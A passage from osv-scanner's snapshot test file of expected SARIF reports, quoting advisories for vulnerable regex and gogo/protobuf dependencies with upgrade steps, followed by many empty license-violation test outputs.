], "message": { "arguments": [], "text": "Package 'regex@1.5.1' is vulnerable to 'CVE-2022-24713' (also known as 'RUSTSEC-2022-0013', 'GHSA-m5pq-gvj9-9vr8')." 
}, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "CVE-2022-24713", "ruleIndex": 0, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "CVE-2022-24713", "RUSTSEC-2022-0013", "GHSA-m5pq-gvj9-9vr8" ], "fullDescription": { "markdown": "The Rust Security Response WG was notified that the `regex` crate did not\nproperly limit the complexity of the regular expressions (regex) it parses. An\nattacker could use this security issue to perform a denial of service, by\nsending a specially crafted regex to a service accepting untrusted regexes. No\nknown vulnerability is present when parsing untrusted input with trusted\nregexes.\n\nThis issue has been assigned CVE-2022-24713. The severity of this vulnerability\nis \"high\" when the `regex` crate is used to parse untrusted regexes. Other uses\nof the `regex` crate are not affected by this vulnerability.\n\n## Overview\n\nThe `regex` crate features built-in mitigations to prevent denial of service\nattacks caused by untrusted regexes, or untrusted input matched by trusted\nregexes. Those (tunable) mitigations already provide sane defaults to prevent\nattacks. This guarantee is documented and it's considered part of the crate's\nAPI.\n\nUnfortunately a bug was discovered in the mitigations designed to prevent\nuntrusted regexes to take an arbitrary amount of time during parsing, and it's\npossible to craft regexes that bypass such mitigations. 
This makes it possible\nto perform denial of service attacks by sending specially crafted regexes to\nservices accepting user-controlled, untrusted regexes.\n\n## Affected versions\n\nAll versions of the `regex` crate before or equal to 1.5.4 are affected by this\nissue. The fix is include starting from `regex` 1.5.5.\n\n## Mitigations\n\nWe recommend everyone accepting user-controlled regexes to upgrade immediately\nto the latest version of the `regex` crate.\n\nUnfortunately there is no fixed set of problematic regexes, as there are\npractically infinite regexes that could be crafted to exploit this\nvulnerability. Because of this, we do not recommend denying known problematic\nregexes.\n\n## Acknowledgements\n\nWe want to thank Addison Crump for responsibly disclosing this to us according\nto the [Rust security policy][1], and for helping review the fix.\n\nWe also want to thank Andrew Gallant for developing the fix, and Pietro Albini\nfor coordinating the disclosure and writing this advisory.\n\n[1]: https://www.rust-lang.org/policies/security", "text": "The Rust Security Response WG was notified that the `regex` crate did not\nproperly limit the complexity of the regular expressions (regex) it parses. An\nattacker could use this security issue to perform a denial of service, by\nsending a specially crafted regex to a service accepting untrusted regexes. No\nknown vulnerability is present when parsing untrusted input with trusted\nregexes.\n\nThis issue has been assigned CVE-2022-24713. The severity of this vulnerability\nis \"high\" when the `regex` crate is used to parse untrusted regexes. Other uses\nof the `regex` crate are not affected by this vulnerability.\n\n## Overview\n\nThe `regex` crate features built-in mitigations to prevent denial of service\nattacks caused by untrusted regexes, or untrusted input matched by trusted\nregexes. Those (tunable) mitigations already provide sane defaults to prevent\nattacks. 
This guarantee is documented and it's considered part of the crate's\nAPI.\n\nUnfortunately a bug was discovered in the mitigations designed to prevent\nuntrusted regexes to take an arbitrary amount of time during parsing, and it's\npossible to craft regexes that bypass such mitigations. This makes it possible\nto perform denial of service attacks by sending specially crafted regexes to\nservices accepting user-controlled, untrusted regexes.\n\n## Affected versions\n\nAll versions of the `regex` crate before or equal to 1.5.4 are affected by this\nissue. The fix is include starting from `regex` 1.5.5.\n\n## Mitigations\n\nWe recommend everyone accepting user-controlled regexes to upgrade immediately\nto the latest version of the `regex` crate.\n\nUnfortunately there is no fixed set of problematic regexes, as there are\npractically infinite regexes that could be crafted to exploit this\nvulnerability. Because of this, we do not recommend denying known problematic\nregexes.\n\n## Acknowledgements\n\nWe want to thank Addison Crump for responsibly disclosing this to us according\nto the [Rust security policy][1], and for helping review the fix.\n\nWe also want to thank Andrew Gallant for developing the fix, and Pietro Albini\nfor coordinating the disclosure and writing this advisory.\n\n[1]: https://www.rust-lang.org/policies/security" }, "help": { "markdown": "**Your dependency is vulnerable to [CVE-2022-24713](https://osv.dev/CVE-2022-24713)**\n(Also published as: [RUSTSEC-2022-0013](https://osv.dev/RUSTSEC-2022-0013), [GHSA-m5pq-gvj9-9vr8](https://osv.dev/GHSA-m5pq-gvj9-9vr8), ).\n\n## [RUSTSEC-2022-0013](https://osv.dev/RUSTSEC-2022-0013)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e The Rust Security Response WG was notified that the `regex` crate did not\n\u003e properly limit the complexity of the regular expressions (regex) it parses. 
An\n\u003e attacker could use this security issue to perform a denial of service, by\n\u003e sending a specially crafted regex to a service accepting untrusted regexes. No\n\u003e known vulnerability is present when parsing untrusted input with trusted\n\u003e regexes.\n\u003e \n\u003e This issue has been assigned CVE-2022-24713. The severity of this vulnerability\n\u003e is \"high\" when the `regex` crate is used to parse untrusted regexes. Other uses\n\u003e of the `regex` crate are not affected by this vulnerability.\n\u003e \n\u003e ## Overview\n\u003e \n\u003e The `regex` crate features built-in mitigations to prevent denial of service\n\u003e attacks caused by untrusted regexes, or untrusted input matched by trusted\n\u003e regexes. Those (tunable) mitigations already provide sane defaults to prevent\n\u003e attacks. This guarantee is documented and it's considered part of the crate's\n\u003e API.\n\u003e \n\u003e Unfortunately a bug was discovered in the mitigations designed to prevent\n\u003e untrusted regexes to take an arbitrary amount of time during parsing, and it's\n\u003e possible to craft regexes that bypass such mitigations. This makes it possible\n\u003e to perform denial of service attacks by sending specially crafted regexes to\n\u003e services accepting user-controlled, untrusted regexes.\n\u003e \n\u003e ## Affected versions\n\u003e \n\u003e All versions of the `regex` crate before or equal to 1.5.4 are affected by this\n\u003e issue. The fix is include starting from `regex` 1.5.5.\n\u003e \n\u003e ## Mitigations\n\u003e \n\u003e We recommend everyone accepting user-controlled regexes to upgrade immediately\n\u003e to the latest version of the `regex` crate.\n\u003e \n\u003e Unfortunately there is no fixed set of problematic regexes, as there are\n\u003e practically infinite regexes that could be crafted to exploit this\n\u003e vulnerability. 
Because of this, we do not recommend denying known problematic\n\u003e regexes.\n\u003e \n\u003e ## Acknowledgements\n\u003e \n\u003e We want to thank Addison Crump for responsibly disclosing this to us according\n\u003e to the [Rust security policy][1], and for helping review the fix.\n\u003e \n\u003e We also want to thank Andrew Gallant for developing the fix, and Pietro Albini\n\u003e for coordinating the disclosure and writing this advisory.\n\u003e \n\u003e [1]: https://www.rust-lang.org/policies/security\n\n\u003c/details\u003e\n\n## [GHSA-m5pq-gvj9-9vr8](https://osv.dev/GHSA-m5pq-gvj9-9vr8)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \u003e This is a cross-post of [the official security advisory][advisory]. The official advisory contains a signed version with our PGP key, as well.\n\u003e \n\u003e [advisory]: https://groups.google.com/g/rustlang-security-announcements/c/NcNNL1Jq7Yw\n\u003e \n\u003e The Rust Security Response WG was notified that the `regex` crate did not properly limit the complexity of the regular expressions (regex) it parses. An attacker could use this security issue to perform a denial of service, by sending a specially crafted regex to a service accepting untrusted regexes. No known vulnerability is present when parsing untrusted input with trusted regexes.\n\u003e \n\u003e This issue has been assigned CVE-2022-24713. The severity of this vulnerability is \"high\" when the `regex` crate is used to parse untrusted regexes. Other uses of the `regex` crate are not affected by this vulnerability.\n\u003e \n\u003e ## Overview\n\u003e \n\u003e The `regex` crate features built-in mitigations to prevent denial of service attacks caused by untrusted regexes, or untrusted input matched by trusted regexes. Those (tunable) mitigations already provide sane defaults to prevent attacks. 
This guarantee is documented and it's considered part of the crate's API.\n\u003e \n\u003e Unfortunately a bug was discovered in the mitigations designed to prevent untrusted regexes to take an arbitrary amount of time during parsing, and it's possible to craft regexes that bypass such mitigations. This makes it possible to perform denial of service attacks by sending specially crafted regexes to services accepting user-controlled, untrusted regexes.\n\u003e \n\u003e ## Affected versions\n\u003e \n\u003e All versions of the `regex` crate before or equal to 1.5.4 are affected by this issue. The fix is include starting from `regex` 1.5.5.\n\u003e \n\u003e ## Mitigations\n\u003e \n\u003e We recommend everyone accepting user-controlled regexes to upgrade immediately to the latest version of the `regex` crate.\n\u003e \n\u003e Unfortunately there is no fixed set of problematic regexes, as there are practically infinite regexes that could be crafted to exploit this vulnerability. Because of this, we do not recommend denying known problematic regexes.\n\u003e \n\u003e ## Acknowledgements\n\u003e \n\u003e We want to thank Addison Crump for responsibly disclosing this to us according to the [Rust security policy](https://www.rust-lang.org/policies/security), and for helping review the fix.\n\u003e \n\u003e We also want to thank Andrew Gallant for developing the fix, and Pietro Albini for coordinating the disclosure and writing this advisory.\n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/sub-rust-project/Cargo.lock | regex | 1.5.1 |\n\n## Remediation\n\nTo fix these vulnerabilities, update the vulnerabilities past the listed fixed versions below.\n\n### Fixed Versions\n\n| Vulnerability ID | Package Name | Fixed Version |\n| --- | --- | --- |\n| GHSA-m5pq-gvj9-9vr8 | regex | 1.5.5 |\n| RUSTSEC-2022-0013 | regex | 1.5.5 |\n\nIf you believe these vulnerabilities do not affect 
your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/sub-rust-project/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"CVE-2022-24713\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [CVE-2022-24713](https://osv.dev/CVE-2022-24713)**\n(Also published as: [RUSTSEC-2022-0013](https://osv.dev/RUSTSEC-2022-0013), [GHSA-m5pq-gvj9-9vr8](https://osv.dev/GHSA-m5pq-gvj9-9vr8), ).\n\n## [RUSTSEC-2022-0013](https://osv.dev/RUSTSEC-2022-0013)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e The Rust Security Response WG was notified that the `regex` crate did not\n\u003e properly limit the complexity of the regular expressions (regex) it parses. An\n\u003e attacker could use this security issue to perform a denial of service, by\n\u003e sending a specially crafted regex to a service accepting untrusted regexes. No\n\u003e known vulnerability is present when parsing untrusted input with trusted\n\u003e regexes.\n\u003e \n\u003e This issue has been assigned CVE-2022-24713. The severity of this vulnerability\n\u003e is \"high\" when the `regex` crate is used to parse untrusted regexes. Other uses\n\u003e of the `regex` crate are not affected by this vulnerability.\n\u003e \n\u003e ## Overview\n\u003e \n\u003e The `regex` crate features built-in mitigations to prevent denial of service\n\u003e attacks caused by untrusted regexes, or untrusted input matched by trusted\n\u003e regexes. Those (tunable) mitigations already provide sane defaults to prevent\n\u003e attacks. 
This guarantee is documented and it's considered part of the crate's\n\u003e API.\n\u003e \n\u003e Unfortunately a bug was discovered in the mitigations designed to prevent\n\u003e untrusted regexes to take an arbitrary amount of time during parsing, and it's\n\u003e possible to craft regexes that bypass such mitigations. This makes it possible\n\u003e to perform denial of service attacks by sending specially crafted regexes to\n\u003e services accepting user-controlled, untrusted regexes.\n\u003e \n\u003e ## Affected versions\n\u003e \n\u003e All versions of the `regex` crate before or equal to 1.5.4 are affected by this\n\u003e issue. The fix is include starting from `regex` 1.5.5.\n\u003e \n\u003e ## Mitigations\n\u003e \n\u003e We recommend everyone accepting user-controlled regexes to upgrade immediately\n\u003e to the latest version of the `regex` crate.\n\u003e \n\u003e Unfortunately there is no fixed set of problematic regexes, as there are\n\u003e practically infinite regexes that could be crafted to exploit this\n\u003e vulnerability. Because of this, we do not recommend denying known problematic\n\u003e regexes.\n\u003e \n\u003e ## Acknowledgements\n\u003e \n\u003e We want to thank Addison Crump for responsibly disclosing this to us according\n\u003e to the [Rust security policy][1], and for helping review the fix.\n\u003e \n\u003e We also want to thank Andrew Gallant for developing the fix, and Pietro Albini\n\u003e for coordinating the disclosure and writing this advisory.\n\u003e \n\u003e [1]: https://www.rust-lang.org/policies/security\n\n\u003c/details\u003e\n\n## [GHSA-m5pq-gvj9-9vr8](https://osv.dev/GHSA-m5pq-gvj9-9vr8)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \u003e This is a cross-post of [the official security advisory][advisory]. 
The official advisory contains a signed version with our PGP key, as well.\n\u003e \n\u003e [advisory]: https://groups.google.com/g/rustlang-security-announcements/c/NcNNL1Jq7Yw\n\u003e \n\u003e The Rust Security Response WG was notified that the `regex` crate did not properly limit the complexity of the regular expressions (regex) it parses. An attacker could use this security issue to perform a denial of service, by sending a specially crafted regex to a service accepting untrusted regexes. No known vulnerability is present when parsing untrusted input with trusted regexes.\n\u003e \n\u003e This issue has been assigned CVE-2022-24713. The severity of this vulnerability is \"high\" when the `regex` crate is used to parse untrusted regexes. Other uses of the `regex` crate are not affected by this vulnerability.\n\u003e \n\u003e ## Overview\n\u003e \n\u003e The `regex` crate features built-in mitigations to prevent denial of service attacks caused by untrusted regexes, or untrusted input matched by trusted regexes. Those (tunable) mitigations already provide sane defaults to prevent attacks. This guarantee is documented and it's considered part of the crate's API.\n\u003e \n\u003e Unfortunately a bug was discovered in the mitigations designed to prevent untrusted regexes to take an arbitrary amount of time during parsing, and it's possible to craft regexes that bypass such mitigations. This makes it possible to perform denial of service attacks by sending specially crafted regexes to services accepting user-controlled, untrusted regexes.\n\u003e \n\u003e ## Affected versions\n\u003e \n\u003e All versions of the `regex` crate before or equal to 1.5.4 are affected by this issue. 
The fix is include starting from `regex` 1.5.5.\n\u003e \n\u003e ## Mitigations\n\u003e \n\u003e We recommend everyone accepting user-controlled regexes to upgrade immediately to the latest version of the `regex` crate.\n\u003e \n\u003e Unfortunately there is no fixed set of problematic regexes, as there are practically infinite regexes that could be crafted to exploit this vulnerability. Because of this, we do not recommend denying known problematic regexes.\n\u003e \n\u003e ## Acknowledgements\n\u003e \n\u003e We want to thank Addison Crump for responsibly disclosing this to us according to the [Rust security policy](https://www.rust-lang.org/policies/security), and for helping review the fix.\n\u003e \n\u003e We also want to thank Andrew Gallant for developing the fix, and Pietro Albini for coordinating the disclosure and writing this advisory.\n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/sub-rust-project/Cargo.lock | regex | 1.5.1 |\n\n## Remediation\n\nTo fix these vulnerabilities, update the vulnerabilities past the listed fixed versions below.\n\n### Fixed Versions\n\n| Vulnerability ID | Package Name | Fixed Version |\n| --- | --- | --- |\n| GHSA-m5pq-gvj9-9vr8 | regex | 1.5.5 |\n| RUSTSEC-2022-0013 | regex | 1.5.5 |\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/sub-rust-project/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"CVE-2022-24713\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "CVE-2022-24713", "name": "CVE-2022-24713", 
"properties": { "security-severity": "7.5" }, "relationships": [], "shortDescription": { "markdown": "CVE-2022-24713: Regexes with large repetitions on empty sub-expressions take a very long time to parse", "text": "CVE-2022-24713: Regexes with large repetitions on empty sub-expressions take a very long time to parse" } }, { "deprecatedIds": [ "CVE-2021-3121", "GO-2021-0053", "GHSA-c3h9-896r-86jm" ], "fullDescription": { "markdown": "Due to improper bounds checking, maliciously crafted input to generated Unmarshal methods can cause an out-of-bounds panic. If parsing messages from untrusted parties, this may be used as a denial of service vector.", "text": "Due to improper bounds checking, maliciously crafted input to generated Unmarshal methods can cause an out-of-bounds panic. If parsing messages from untrusted parties, this may be used as a denial of service vector." }, "help": { "markdown": "**Your dependency is vulnerable to [CVE-2021-3121](https://osv.dev/CVE-2021-3121)**.\n\n## [GO-2021-0053](https://osv.dev/GO-2021-0053)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e Due to improper bounds checking, maliciously crafted input to generated Unmarshal methods can cause an out-of-bounds panic. 
If parsing messages from untrusted parties, this may be used as a denial of service vector.\n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/go.mod | github.com/gogo/protobuf | 1.3.1 |\n\n## Remediation\n\nTo fix these vulnerabilities, update the vulnerabilities past the listed fixed versions below.\n\n### Fixed Versions\n\n| Vulnerability ID | Package Name | Fixed Version |\n| --- | --- | --- |\n| GO-2021-0053 | github.com/gogo/protobuf | 1.3.2 |\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"CVE-2021-3121\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [CVE-2021-3121](https://osv.dev/CVE-2021-3121)**.\n\n## [GO-2021-0053](https://osv.dev/GO-2021-0053)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e Due to improper bounds checking, maliciously crafted input to generated Unmarshal methods can cause an out-of-bounds panic. 
If parsing messages from untrusted parties, this may be used as a denial of service vector.\n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/go.mod | github.com/gogo/protobuf | 1.3.1 |\n\n## Remediation\n\nTo fix these vulnerabilities, update the vulnerabilities past the listed fixed versions below.\n\n### Fixed Versions\n\n| Vulnerability ID | Package Name | Fixed Version |\n| --- | --- | --- |\n| GO-2021-0053 | github.com/gogo/protobuf | 1.3.2 |\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"CVE-2021-3121\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "CVE-2021-3121", "name": "CVE-2021-3121", "relationships": [], "shortDescription": { "markdown": "CVE-2021-3121: Panic due to improper input validation in github.com/gogo/protobuf", "text": "CVE-2021-3121: Panic due to improper input validation in github.com/gogo/protobuf" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_no_license_violations - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], 
"newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations#01 - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], 
"policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_some_license_violations - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_and_groups,_some_license_violations - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": 
[], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithLicenseViolations/multiple_sources_with_no_packages - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithLicenseViolations/no_sources - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ 
"localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithLicenseViolations/one_source_with_no_packages - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithLicenseViolations/one_source_with_one_package,_no_license_violations - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", 
"isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithLicenseViolations/one_source_with_one_package,_no_licenses - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithLicenseViolations/one_source_with_one_package_and_an_unknown_license - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", 
"notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithLicenseViolations/one_source_with_one_package_and_multiple_license_violations - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithLicenseViolations/one_source_with_one_package_and_one_license_violation - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ 